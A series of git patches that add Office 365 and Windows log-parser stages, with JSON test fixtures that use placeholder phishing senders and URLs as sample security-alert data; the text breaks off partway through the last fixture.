+    "message": "{\"AppAccessContext\":{\"AADSessionId\":\"000-000-000-000\",\"ClientAppId\":\"000-000-000-000\",\"ClientAppName\":\"Microsoft Teams\",\"CorrelationId\":\"000-000-000-000\",\"UniqueTokenId\":\"xxxxxx\"},\"CreationTime\":\"2024-10-29T07:41:53\",\"Id\":\"000-000-000-000\",\"Operation\":\"AddedToSecureLink\",\"OrganizationId\":\"000-000-000-000\",\"RecordType\":14,\"UserKey\":\"userkey@live.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"OneDrive\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"user.name@compagny.com\",\"ApplicationId\":\"000-000-000-000\",\"AuthenticationType\":\"OAuth\",\"BrowserName\":\"Edge\",\"BrowserVersion\":\"130.0.0.0\",\"CorrelationId\":\"000-000-000-000\",\"EventSource\":\"SharePoint\",\"GeoLocation\":\"EUR\",\"IsManagedDevice\":true,\"ItemType\":\"File\",\"ListId\":\"000-000-000-000\",\"ListItemUniqueId\":\"000-000-000-000\",\"Platform\":\"WinDesktop\",\"Site\":\"000-000-000-000\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49\",\"WebId\":\"000-000-000-000\",\"DeviceDisplayName\":\"000-000-000-000\",\"EventData\":\"<Type>Edit</Type><MembersCanShareApplied>False</MembersCanShareApplied>\",\"SourceFileExtension\":\"pdf\",\"TargetUserOrGroupType\":\"Member\",\"UniqueSharingId\":\"000-000-000-000\",\"TargetUserOrGroupName\":\"target_user_name_value\",\"SiteUrl\":\"https://compagny-my.sharepoint.com/personal/usrename\",\"SourceRelativeUrl\":\"Documents/filename.pdf\",\"SourceFileName\":\"filename.pdf\",\"ApplicationDisplayName\":\"Microsoft Teams\",\"ObjectId\":\"https://compagny-my.sharepoint.com/personal/docname.pdf\",\"AssociatedAdminUnits\":[\"000-000-000-000\"]}",
+    "event": {
+      "action": "AddedToSecureLink",
+      "category": [
+        "file"
+      ],
+      "code": "14",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-29T07:41:53Z",
+    "action": {
+      "id": 14,
+      "name": "AddedToSecureLink",
+      "outcome": "success",
+      "properties": [
+        {
+          "SiteUrl": "https://compagny-my.sharepoint.com/personal/usrename",
+          "SourceFileName": "filename.pdf",
+          "SourceRelativeUrl": "Documents/filename.pdf",
+          "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49"
+        }
+      ],
+      "target": "user"
+    },
+    "file": {
+      "directory": "Documents/filename.pdf",
+      "extension": "pdf",
+      "name": "filename.pdf"
+    },
+    "office365": {
+      "audit": {
+        "object_id": "https://compagny-my.sharepoint.com/personal/docname.pdf"
+      },
+      "context": {
+        "aad_session_id": "000-000-000-000",
+        "client": {
+          "id": "000-000-000-000",
+          "name": "Microsoft Teams"
+        },
+        "correlation": {
+          "id": "000-000-000-000"
+        }
+      },
+      "record_type": 14,
+      "user_type": {
+        "code": 0,
+        "name": "Regular"
+      }
+    },
+    "organization": {
+      "id": "000-000-000-000"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "user.name@compagny.com"
+      ]
+    },
+    "service": {
+      "name": "OneDrive"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "url": {
+      "domain": "compagny-my.sharepoint.com",
+      "full": "https://compagny-my.sharepoint.com/personal/docname.pdf",
+      "original": "https://compagny-my.sharepoint.com/personal/docname.pdf",
+      "path": "/personal/docname.pdf",
+      "port": 443,
+      "registered_domain": "sharepoint.com",
+      "scheme": "https",
+      "subdomain": "compagny-my",
+      "top_level_domain": "com"
+    },
+    "user": {
+      "email": "user.name@compagny.com",
+      "id": "userkey@live.com",
+      "name": "user.name@compagny.com",
+      "target": {
+        "name": "target_user_name_value"
+      }
+    },
+    "user_agent": {
+      "device": {
+        "name": "Other"
+      },
+      "name": "Edge",
+      "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49",
+      "os": {
+        "name": "Windows",
+        "version": "10"
+      },
+      "version": "130.0.0"
+    }
+  }
+}
\ No newline at end of file

From b23ed9b31e0c70e7b28a1cd67a9a158ae3624085 Mon Sep 17 00:00:00 2001
From: rombernier <romain.bernier@sekoia.io>
Date: Tue, 29 Oct 2024 09:12:39 +0100
Subject: [PATCH 174/317] add target user name

---
 Office 365/o365/tests/targetusername.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Office 365/o365/tests/targetusername.json b/Office 365/o365/tests/targetusername.json
index b32a0baa4..ec3137b79 100644
--- a/Office 365/o365/tests/targetusername.json	
+++ b/Office 365/o365/tests/targetusername.json	
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"AppAccessContext\":{\"AADSessionId\":\"000-000-000-000\",\"ClientAppId\":\"000-000-000-000\",\"ClientAppName\":\"Microsoft Teams\",\"CorrelationId\":\"000-000-000-000\",\"UniqueTokenId\":\"xxxxxx\"},\"CreationTime\":\"2024-10-29T07:41:53\",\"Id\":\"000-000-000-000\",\"Operation\":\"AddedToSecureLink\",\"OrganizationId\":\"000-000-000-000\",\"RecordType\":14,\"UserKey\":\"userkey@live.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"OneDrive\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"user.name@compagny.com\",\"ApplicationId\":\"000-000-000-000\",\"AuthenticationType\":\"OAuth\",\"BrowserName\":\"Edge\",\"BrowserVersion\":\"130.0.0.0\",\"CorrelationId\":\"000-000-000-000\",\"EventSource\":\"SharePoint\",\"GeoLocation\":\"EUR\",\"IsManagedDevice\":true,\"ItemType\":\"File\",\"ListId\":\"000-000-000-000\",\"ListItemUniqueId\":\"000-000-000-000\",\"Platform\":\"WinDesktop\",\"Site\":\"000-000-000-000\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49\",\"WebId\":\"000-000-000-000\",\"DeviceDisplayName\":\"000-000-000-000\",\"EventData\":\"<Type>Edit</Type><MembersCanShareApplied>False</MembersCanShareApplied>\",\"SourceFileExtension\":\"pdf\",\"TargetUserOrGroupType\":\"Member\",\"UniqueSharingId\":\"000-000-000-000\",\"TargetUserOrGroupName\":\"target_user_name_value\",\"SiteUrl\":\"https://compagny-my.sharepoint.com/personal/usrename\",\"SourceRelativeUrl\":\"Documents/filename.pdf\",\"SourceFileName\":\"filename.pdf\",\"ApplicationDisplayName\":\"Microsoft Teams\",\"ObjectId\":\"https://compagny-my.sharepoint.com/personal/docname.pdf\",\"AssociatedAdminUnits\":[\"000-000-000-000\"]}",
     "sekoiaio": {
       "intake": {
         "dialect": "Microsoft 365 / Office 365",
         "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99"
       }
-    },
-    "message": "{\"AppAccessContext\":{\"AADSessionId\":\"000-000-000-000\",\"ClientAppId\":\"000-000-000-000\",\"ClientAppName\":\"Microsoft Teams\",\"CorrelationId\":\"000-000-000-000\",\"UniqueTokenId\":\"xxxxxx\"},\"CreationTime\":\"2024-10-29T07:41:53\",\"Id\":\"000-000-000-000\",\"Operation\":\"AddedToSecureLink\",\"OrganizationId\":\"000-000-000-000\",\"RecordType\":14,\"UserKey\":\"userkey@live.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"OneDrive\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"user.name@compagny.com\",\"ApplicationId\":\"000-000-000-000\",\"AuthenticationType\":\"OAuth\",\"BrowserName\":\"Edge\",\"BrowserVersion\":\"130.0.0.0\",\"CorrelationId\":\"000-000-000-000\",\"EventSource\":\"SharePoint\",\"GeoLocation\":\"EUR\",\"IsManagedDevice\":true,\"ItemType\":\"File\",\"ListId\":\"000-000-000-000\",\"ListItemUniqueId\":\"000-000-000-000\",\"Platform\":\"WinDesktop\",\"Site\":\"000-000-000-000\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49\",\"WebId\":\"000-000-000-000\",\"DeviceDisplayName\":\"000-000-000-000\",\"EventData\":\"<Type>Edit</Type><MembersCanShareApplied>False</MembersCanShareApplied>\",\"SourceFileExtension\":\"pdf\",\"TargetUserOrGroupType\":\"Member\",\"UniqueSharingId\":\"000-000-000-000\",\"TargetUserOrGroupName\":\"target_user_name_value\",\"SiteUrl\":\"https://compagny-my.sharepoint.com/personal/usrename\",\"SourceRelativeUrl\":\"Documents/filename.pdf\",\"SourceFileName\":\"filename.pdf\",\"ApplicationDisplayName\":\"Microsoft Teams\",\"ObjectId\":\"https://compagny-my.sharepoint.com/personal/docname.pdf\",\"AssociatedAdminUnits\":[\"000-000-000-000\"]}"
+    }
   },
   "expected": {
     "message": "{\"AppAccessContext\":{\"AADSessionId\":\"000-000-000-000\",\"ClientAppId\":\"000-000-000-000\",\"ClientAppName\":\"Microsoft Teams\",\"CorrelationId\":\"000-000-000-000\",\"UniqueTokenId\":\"xxxxxx\"},\"CreationTime\":\"2024-10-29T07:41:53\",\"Id\":\"000-000-000-000\",\"Operation\":\"AddedToSecureLink\",\"OrganizationId\":\"000-000-000-000\",\"RecordType\":14,\"UserKey\":\"userkey@live.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"OneDrive\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"user.name@compagny.com\",\"ApplicationId\":\"000-000-000-000\",\"AuthenticationType\":\"OAuth\",\"BrowserName\":\"Edge\",\"BrowserVersion\":\"130.0.0.0\",\"CorrelationId\":\"000-000-000-000\",\"EventSource\":\"SharePoint\",\"GeoLocation\":\"EUR\",\"IsManagedDevice\":true,\"ItemType\":\"File\",\"ListId\":\"000-000-000-000\",\"ListItemUniqueId\":\"000-000-000-000\",\"Platform\":\"WinDesktop\",\"Site\":\"000-000-000-000\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49\",\"WebId\":\"000-000-000-000\",\"DeviceDisplayName\":\"000-000-000-000\",\"EventData\":\"<Type>Edit</Type><MembersCanShareApplied>False</MembersCanShareApplied>\",\"SourceFileExtension\":\"pdf\",\"TargetUserOrGroupType\":\"Member\",\"UniqueSharingId\":\"000-000-000-000\",\"TargetUserOrGroupName\":\"target_user_name_value\",\"SiteUrl\":\"https://compagny-my.sharepoint.com/personal/usrename\",\"SourceRelativeUrl\":\"Documents/filename.pdf\",\"SourceFileName\":\"filename.pdf\",\"ApplicationDisplayName\":\"Microsoft Teams\",\"ObjectId\":\"https://compagny-my.sharepoint.com/personal/docname.pdf\",\"AssociatedAdminUnits\":[\"000-000-000-000\"]}",

From b271d017c19110389e9f23dc53129fa8be8890de Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?=
 <129874202+gcl-sekoia@users.noreply.github.com>
Date: Tue, 29 Oct 2024 12:01:52 +0100
Subject: [PATCH 175/317] fix(o365): parse url in TIUrlClickData events

---
 Office 365/o365/ingest/parser.yml                        | 7 +++++++
 .../microsoft_defender_threatintelligence_url_click.json | 9 +++++++++
 2 files changed, 16 insertions(+)

diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index c3239441a..5a2a1b116 100644
--- a/Office 365/o365/ingest/parser.yml	
+++ b/Office 365/o365/ingest/parser.yml	
@@ -63,6 +63,8 @@ pipeline:
     filter: "{{json_event.message.RecordType == 36}}"
   - name: parse_power_bi
     filter: "{{json_event.message.RecordType == 20}}"
+  - name: parse_threat_intelligence_url
+    filter: "{{json_event.message.RecordType == 41}}"
 
 stages:
   set_common_fields:
@@ -652,3 +654,8 @@ stages:
     actions:
       - set:
           user_agent.original: "{{json_event.message.UserAgent}}"
+
+  parse_threat_intelligence_url:
+    actions:
+      - set:
+          url.original: "{{json_event.message.Url}}"
diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json
index dc8b8decb..59fdd35ce 100644
--- a/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json	
+++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json	
@@ -35,6 +35,15 @@
     "service": {
       "name": "ThreatIntelligence"
     },
+    "url": {
+      "domain": "malicious.domain.com",
+      "original": "https://malicious.domain.com",
+      "port": 443,
+      "registered_domain": "domain.com",
+      "scheme": "https",
+      "subdomain": "malicious",
+      "top_level_domain": "com"
+    },
     "user": {
       "email": "human@example.org",
       "id": "ThreatIntel",

From 1e40f55486964d9f5324ba1dd8546012bb905f8f Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 29 Oct 2024 14:42:57 +0100
Subject: [PATCH 176/317] Windows enhancement: parsing of LmPackageName field

---
 Windows/windows/ingest/parser.yml     | 9 +++++++++
 Windows/windows/tests/logon_4624.json | 5 +++++
 2 files changed, 14 insertions(+)

diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 5709d4345..988ae3dbc 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -325,6 +325,15 @@ stages:
           user.target.domain: "{{json.event.TargetDomainName}}"
           user.target.id: "{{json.event.TargetUserSid}}"
 
+      - set:
+          package.name: "{{json.event.LmPackageName.split()|first}}"
+          package.description: "LAN Manager package"
+        filter: "{{json.event.LmPackageName not in [null, '-']}}"
+
+      - set:
+          package.version: "{{json.event.LmPackageName.split()|last}}"
+        filter: "{{json.event.LmPackageName != null and json.event.LmPackageName.split()|length > 1}}"
+
       - set:
           event.message: "{{json.event.Message}}"
           # do not include Message containing a json document
diff --git a/Windows/windows/tests/logon_4624.json b/Windows/windows/tests/logon_4624.json
index 37704e0eb..b466f8bf1 100644
--- a/Windows/windows/tests/logon_4624.json
+++ b/Windows/windows/tests/logon_4624.json
@@ -62,6 +62,11 @@
       "family": "windows",
       "platform": "windows"
     },
+    "package": {
+      "description": "LAN Manager package",
+      "name": "NTLM",
+      "version": "V2"
+    },
     "process": {
       "id": 744,
       "pid": 744,

From 49fd0202d7f10cd647e214538cdf18a2e67a7dd8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?=
 <129874202+gcl-sekoia@users.noreply.github.com>
Date: Fri, 25 Oct 2024 11:42:20 +0200
Subject: [PATCH 177/317] fix(o365): Add test case for SecurityComplianceAlert
 with url

---
 .../tests/security_compliance_alert_7.json    | 85 +++++++++++++++++++
 1 file changed, 85 insertions(+)
 create mode 100644 Office 365/o365/tests/security_compliance_alert_7.json

diff --git a/Office 365/o365/tests/security_compliance_alert_7.json b/Office 365/o365/tests/security_compliance_alert_7.json
new file mode 100644
index 000000000..efc5f5ca6
--- /dev/null
+++ b/Office 365/o365/tests/security_compliance_alert_7.json	
@@ -0,0 +1,85 @@
+{
+  "input": {
+    "message": "{\"CreationTime\":\"2024-10-24T09:10:38\",\"Id\":\"9b1762d6-2667-4c2d-ad8f-5faa9b9dbad8\",\"Operation\":\"AlertEntityGenerated\",\"OrganizationId\":\"3995fc59-1c0e-4812-b0f1-5308a209ef5e\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\",\"ObjectId\":\"32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1\",\"UserId\":\"SecurityComplianceAlerts\",\"AlertEntityId\":\"32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1\",\"AlertId\":\"6c88ef80-67f0-4a32-b1c9-4696ba48a3e4\",\"AlertLinks\":[{\"AlertLinkHref\":\"\"}],\"AlertType\":\"System\",\"Category\":\"ThreatManagement\",\"Comments\":\"New alert\",\"Data\":\"{\\\"etype\\\":\\\"MalwareFamily\\\",\\\"at\\\":\\\"2024-10-24T09:07:19.0000000Z\\\",\\\"md\\\":\\\"2024-10-24T07:08:32.0000000Z\\\",\\\"sip\\\":null,\\\"ms\\\":\\\" [TEST] Click on this!!!\\\",\\\"imsgid\\\":\\\"<AFIA3GCDITNgUgIKlOF5n5oH.1.1729763630549.mail.evil@bad.com>\\\",\\\"ttdt\\\":\\\"2024-10-24T09:07:19.0000000Z\\\",\\\"ttr\\\":\\\"Success_MessageQuarantined\\\",\\\"dm\\\":\\\"UrlReputation\\\",\\\"eid\\\":\\\"32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1\\\",\\\"aii\\\":\\\"32c70dd6-ce69-434d-b52a-0d876696fd8d\\\",\\\"thn\\\":\\\"Phish, Malicious\\\",\\\"ts\\\":\\\"2024-10-24T09:06:19.0000000Z\\\",\\\"te\\\":\\\"2024-10-24T09:08:19.0000000Z\\\",\\\"fvs\\\":\\\"Filters\\\",\\\"tpt\\\":\\\"HostedContentFilterPolicy\\\",\\\"tpid\\\":\\\"f0749efa-70b1-4420-94f7-9527b4f7f677\\\",\\\"tid\\\":\\\"3995fc59-1c0e-4812-b0f1-5308a209ef5e\\\",\\\"tht\\\":\\\"Phish, Malicious\\\",\\\"trc\\\":\\\"test.user@example.com\\\",\\\"tsd\\\":\\\"evil@bad.com\\\",\\\"zu\\\":\\\"clickonthis.example.com/api/phishing\\\",\\\"pud\\\":\\\"clickonthis.example.com/api/phishing\\\",\\\"tdc\\\":\\\"1\\\",\\\"cpid\\\":null,\\\"lon\\\":\\\"Protection\\\"}\",\"EntityType\":\"MalwareFamily\",\"Name\":\"Email messages containing malicious URL removed after delivery\u200b\",\"PolicyId\":\"55087523-49bd-4bbd-b269-cda496a06d05\",\"Severity\":\"Informational\",\"Source\":\"Office 365 Security & Compliance\",\"Status\":\"Active\"}\n",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 / Office 365",
+        "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"CreationTime\":\"2024-10-24T09:10:38\",\"Id\":\"9b1762d6-2667-4c2d-ad8f-5faa9b9dbad8\",\"Operation\":\"AlertEntityGenerated\",\"OrganizationId\":\"3995fc59-1c0e-4812-b0f1-5308a209ef5e\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\",\"ObjectId\":\"32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1\",\"UserId\":\"SecurityComplianceAlerts\",\"AlertEntityId\":\"32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1\",\"AlertId\":\"6c88ef80-67f0-4a32-b1c9-4696ba48a3e4\",\"AlertLinks\":[{\"AlertLinkHref\":\"\"}],\"AlertType\":\"System\",\"Category\":\"ThreatManagement\",\"Comments\":\"New alert\",\"Data\":\"{\\\"etype\\\":\\\"MalwareFamily\\\",\\\"at\\\":\\\"2024-10-24T09:07:19.0000000Z\\\",\\\"md\\\":\\\"2024-10-24T07:08:32.0000000Z\\\",\\\"sip\\\":null,\\\"ms\\\":\\\" [TEST] Click on this!!!\\\",\\\"imsgid\\\":\\\"<AFIA3GCDITNgUgIKlOF5n5oH.1.1729763630549.mail.evil@bad.com>\\\",\\\"ttdt\\\":\\\"2024-10-24T09:07:19.0000000Z\\\",\\\"ttr\\\":\\\"Success_MessageQuarantined\\\",\\\"dm\\\":\\\"UrlReputation\\\",\\\"eid\\\":\\\"32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1\\\",\\\"aii\\\":\\\"32c70dd6-ce69-434d-b52a-0d876696fd8d\\\",\\\"thn\\\":\\\"Phish, Malicious\\\",\\\"ts\\\":\\\"2024-10-24T09:06:19.0000000Z\\\",\\\"te\\\":\\\"2024-10-24T09:08:19.0000000Z\\\",\\\"fvs\\\":\\\"Filters\\\",\\\"tpt\\\":\\\"HostedContentFilterPolicy\\\",\\\"tpid\\\":\\\"f0749efa-70b1-4420-94f7-9527b4f7f677\\\",\\\"tid\\\":\\\"3995fc59-1c0e-4812-b0f1-5308a209ef5e\\\",\\\"tht\\\":\\\"Phish, Malicious\\\",\\\"trc\\\":\\\"test.user@example.com\\\",\\\"tsd\\\":\\\"evil@bad.com\\\",\\\"zu\\\":\\\"clickonthis.example.com/api/phishing\\\",\\\"pud\\\":\\\"clickonthis.example.com/api/phishing\\\",\\\"tdc\\\":\\\"1\\\",\\\"cpid\\\":null,\\\"lon\\\":\\\"Protection\\\"}\",\"EntityType\":\"MalwareFamily\",\"Name\":\"Email messages containing malicious URL removed after delivery\u200b\",\"PolicyId\":\"55087523-49bd-4bbd-b269-cda496a06d05\",\"Severity\":\"Informational\",\"Source\":\"Office 365 Security & Compliance\",\"Status\":\"Active\"}\n",
+    "event": {
+      "action": "AlertEntityGenerated",
+      "category": [
+        "intrusion_detection"
+      ],
+      "code": "40",
+      "kind": "alert",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-24T09:10:38Z",
+    "action": {
+      "id": 40,
+      "name": "AlertEntityGenerated",
+      "outcome": "success",
+      "target": "user"
+    },
+    "email": {
+      "from": {
+        "address": [
+          "evil@bad.com"
+        ]
+      },
+      "message_id": "AFIA3GCDITNgUgIKlOF5n5oH.1.1729763630549.mail.evil@bad.com",
+      "subject": " [TEST] Click on this!!!",
+      "to": {
+        "address": [
+          "test.user@example.com"
+        ]
+      }
+    },
+    "office365": {
+      "alert": {
+        "category": "ThreatManagement",
+        "display_name": "Email messages containing malicious URL removed after delivery\u200b",
+        "entity_type": "MalwareFamily",
+        "id": "6c88ef80-67f0-4a32-b1c9-4696ba48a3e4",
+        "severity": "Informational",
+        "source": "Office 365 Security & Compliance",
+        "status": "Active"
+      },
+      "audit": {
+        "object_id": "32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1"
+      },
+      "record_type": 40,
+      "result_status": "Succeeded",
+      "user_type": {
+        "code": 4,
+        "name": "System"
+      }
+    },
+    "organization": {
+      "id": "3995fc59-1c0e-4812-b0f1-5308a209ef5e"
+    },
+    "related": {
+      "user": [
+        "SecurityComplianceAlerts"
+      ]
+    },
+    "rule": {
+      "id": "55087523-49bd-4bbd-b269-cda496a06d05"
+    },
+    "service": {
+      "name": "SecurityComplianceCenter"
+    },
+    "user": {
+      "id": "SecurityComplianceAlerts",
+      "name": "SecurityComplianceAlerts"
+    }
+  }
+}
\ No newline at end of file

From 0571d334b2930db5a8c1ab5ac4abf28d1b1c7172 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?=
 <129874202+gcl-sekoia@users.noreply.github.com>
Date: Fri, 25 Oct 2024 11:48:55 +0200
Subject: [PATCH 178/317] fix(o365): Add parsing of URLs in
 SecurityComplianceAlert

---
 Office 365/o365/ingest/parser.yml                      | 4 ++++
 Office 365/o365/tests/security_compliance_alert_7.json | 8 ++++++++
 2 files changed, 12 insertions(+)

diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index 5a2a1b116..e5a34547a 100644
--- a/Office 365/o365/ingest/parser.yml	
+++ b/Office 365/o365/ingest/parser.yml	
@@ -650,6 +650,10 @@ stages:
           email.to.address: "{{parse_data.ParsedData.trc.split(',')}}"
         filter: "{{parse_data.ParsedData.trc != None}}"
 
+      - set:
+          url.original: "//{{parse_data.ParsedData.pud}}"
+        filter: "{{parse_data.ParsedData.pud[0] != None}}"
+
   parse_power_bi:
     actions:
       - set:
diff --git a/Office 365/o365/tests/security_compliance_alert_7.json b/Office 365/o365/tests/security_compliance_alert_7.json
index efc5f5ca6..0775bbdc8 100644
--- a/Office 365/o365/tests/security_compliance_alert_7.json	
+++ b/Office 365/o365/tests/security_compliance_alert_7.json	
@@ -77,6 +77,14 @@
     "service": {
       "name": "SecurityComplianceCenter"
     },
+    "url": {
+      "domain": "clickonthis.example.com",
+      "original": "//clickonthis.example.com/api/phishing",
+      "path": "/api/phishing",
+      "registered_domain": "example.com",
+      "subdomain": "clickonthis",
+      "top_level_domain": "com"
+    },
     "user": {
       "id": "SecurityComplianceAlerts",
       "name": "SecurityComplianceAlerts"

From 5a4ce0f5c95a36ece31cbf5921841ad4d20fb4e6 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?=
 <129874202+gcl-sekoia@users.noreply.github.com>
Date: Tue, 29 Oct 2024 13:36:25 +0100
Subject: [PATCH 179/317] fix(o365): Add test case for SecurityComplianceAlert
 with MaliciousUrl

---
 ...curity_compliance_alert_malicious_url.json | 78 +++++++++++++++++++
 1 file changed, 78 insertions(+)
 create mode 100644 Office 365/o365/tests/security_compliance_alert_malicious_url.json

diff --git a/Office 365/o365/tests/security_compliance_alert_malicious_url.json b/Office 365/o365/tests/security_compliance_alert_malicious_url.json
new file mode 100644
index 000000000..83d6877e6
--- /dev/null
+++ b/Office 365/o365/tests/security_compliance_alert_malicious_url.json	
@@ -0,0 +1,78 @@
+{
+  "input": {
+    "message": "{\"CreationTime\":\"2024-10-07T20:29:25\",\"Id\":\"33c6081c-a402-49a3-828e-8e6df08c5e90\",\"Operation\":\"AlertEntityGenerated\",\"OrganizationId\":\"b76bf78d-7696-4b17-bbda-e9995c266879\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\",\"ObjectId\":\"https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh\",\"UserId\":\"SecurityComplianceAlerts\",\"AlertEntityId\":\"https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh\",\"AlertId\":\"657fb16a-ee7f-4939-a218-33ba3c72805e\",\"AlertLinks\":[{\"AlertLinkHref\":\"\"}],\"AlertType\":\"System\",\"Category\":\"ThreatManagement\",\"Comments\":\"New alert\",\"Data\":\"{\\\"etype\\\":\\\"MaliciousUrl\\\",\\\"aii\\\":\\\"d6c7276b-3a65-43c7-9e25-525f7e289543\\\",\\\"eid\\\":\\\"https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh\\\",\\\"curlh\\\":\\\"12815939189066485645\\\",\\\"tid\\\":\\\"b76bf78d-7696-4b17-bbda-e9995c266879\\\",\\\"ts\\\":\\\"2024-10-07T20:07:11.0000000Z\\\",\\\"te\\\":\\\"2024-10-07T20:07:11.0000000Z\\\",\\\"trc\\\":\\\"test.user@example.org\\\",\\\"tdc\\\":\\\"1\\\",\\\"at\\\":\\\"2024-10-07T20:07:11.0000000Z\\\",\\\"dm\\\":\\\"MDO Safe Links\\\",\\\"ot\\\":\\\"Allowed\\\",\\\"od\\\":\\\"User clicked on a URL which was identified as potentially malicious at a later time.\\\",\\\"md\\\":\\\"2024-10-07T20:29:25.5945545Z\\\",\\\"lon\\\":\\\"MaliciousUrlClick\\\"}\",\"EntityType\":\"MaliciousUrl\",\"Name\":\"A potentially malicious URL click was detected\",\"PolicyId\":\"471d921d-e417-41c4-be33-ad67040f3ece\",\"Severity\":\"High\",\"Source\":\"Office 365 Security & Compliance\",\"Status\":\"Active\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 / Office 365",
+        "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"CreationTime\":\"2024-10-07T20:29:25\",\"Id\":\"33c6081c-a402-49a3-828e-8e6df08c5e90\",\"Operation\":\"AlertEntityGenerated\",\"OrganizationId\":\"b76bf78d-7696-4b17-bbda-e9995c266879\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\",\"ObjectId\":\"https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh\",\"UserId\":\"SecurityComplianceAlerts\",\"AlertEntityId\":\"https://test-d7a3.evil.net/?param=SGVsbG8gV29ybGQh\",\"AlertId\":\"657fb16a-ee7f-4939-a218-33ba3c72805e\",\"AlertLinks\":[{\"AlertLinkHref\":\"\"}],\"AlertType\":\"System\",\"Category\":\"ThreatManagement\",\"Comments\":\"New 